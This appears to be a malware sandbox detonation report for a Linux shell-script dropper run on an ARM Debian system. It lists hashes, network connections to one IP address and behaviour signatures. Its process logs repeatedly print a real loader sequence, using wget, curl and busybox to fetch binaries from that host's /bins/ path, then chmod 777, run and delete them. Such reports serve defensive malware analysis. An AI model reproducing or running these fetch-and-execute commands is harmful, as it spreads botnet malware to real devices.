[chmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC

[./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/rm

[rm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/chmod

[chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

[./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/rm

[rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/wget

[wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/chmod

[chmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs

[./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/rm

[rm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/wget

[wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/chmod

[chmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

[./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/rm

[rm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/wget

[wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/chmod

[chmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL

[./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/rm

[rm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/wget

[wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/chmod

[chmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu

[./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/rm

[rm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/wget

[wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/chmod

[chmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f

[./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/rm

[rm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/wget

[wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/chmod

[chmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P

[./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/rm

[rm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/wget

[wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/chmod

[chmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe

[./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/rm

[rm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/wget

[wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/chmod

[chmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy

[./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/rm

[rm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 151.101.193.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 195.181.164.14:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-25 02:54

Reported

2024-11-25 02:58

Platform

debian9-armhf-20240611-en

Max time kernel

60s

Max time network

103s

Command Line

[/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 N/A
N/A /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 N/A
N/A /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs N/A
N/A /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q N/A
N/A /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF N/A
N/A /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB N/A
N/A /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av N/A
N/A /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC N/A
N/A /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL N/A
N/A /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P N/A
N/A /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe N/A
N/A /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy N/A
N/A /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu N/A
N/A /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f N/A
N/A /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 N/A
N/A /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF N/A
N/A /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB N/A
N/A /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av N/A
N/A /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC N/A
N/A /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 N/A
N/A /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs N/A
N/A /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q N/A
N/A /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL N/A
N/A /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu N/A
N/A /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /usr/bin/curl N/A
File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /usr/bin/curl N/A
File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /usr/bin/curl N/A
File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /usr/bin/curl N/A
File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /usr/bin/curl N/A
File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /usr/bin/curl N/A
File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /usr/bin/curl N/A
File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /usr/bin/curl N/A
File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /usr/bin/curl N/A
File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /usr/bin/curl N/A
File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /usr/bin/curl N/A
File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /usr/bin/curl N/A
File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /usr/bin/curl N/A
File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /usr/bin/curl N/A
File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /usr/bin/curl N/A
File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /usr/bin/curl N/A
File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /usr/bin/curl N/A
File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /usr/bin/curl N/A
File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /usr/bin/curl N/A
File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /usr/bin/curl N/A
File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /usr/bin/curl N/A
File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /usr/bin/curl N/A
File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /usr/bin/curl N/A
File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /usr/bin/curl N/A
File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /usr/bin/curl N/A

Processes

/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh

[/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/chmod

[chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

[./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/rm

[rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/wget

[wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/chmod

[chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

[./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/rm

[rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/wget

[wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/chmod

[chmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs

[./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/rm

[rm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/wget

[wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/chmod

[chmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

[./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/rm

[rm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/wget

[wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/chmod

[chmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF

[./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/rm

[rm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/wget

[wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/chmod

[chmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB

[./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/rm

[rm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/wget

[wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/chmod

[chmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av

[./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/rm

[rm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/wget

[wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/curl

